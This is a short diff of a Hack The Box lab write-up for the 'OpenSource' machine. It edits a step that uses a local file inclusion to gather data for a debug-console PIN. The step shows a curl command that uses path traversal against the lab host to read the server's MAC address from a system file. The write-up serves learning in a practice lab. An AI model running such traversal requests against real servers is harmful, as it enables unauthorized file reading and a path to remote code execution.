Marcejr117/Hacking-Notes-Writeups/content/Walkthrough/HTB/OpenSource.md

 > ![[Pasted image 20250226163759.png]]

 ## Inicial Access 2nd Method
-- As we saw above we have a LFI so we have access to the data we need to generate a PIN code to get access to debug console, so get the MAC address:
+- As we saw above we have a LFI so we have access to the data we need to generate a PIN code to get access to debug console, so the MAC address:
 ```bash
 curl http://10.10.11.164/uploads/..//sys/class/net/eth0/address --path-as-is --ignore-content-length
 python -c 'print(0x0242ac110007)'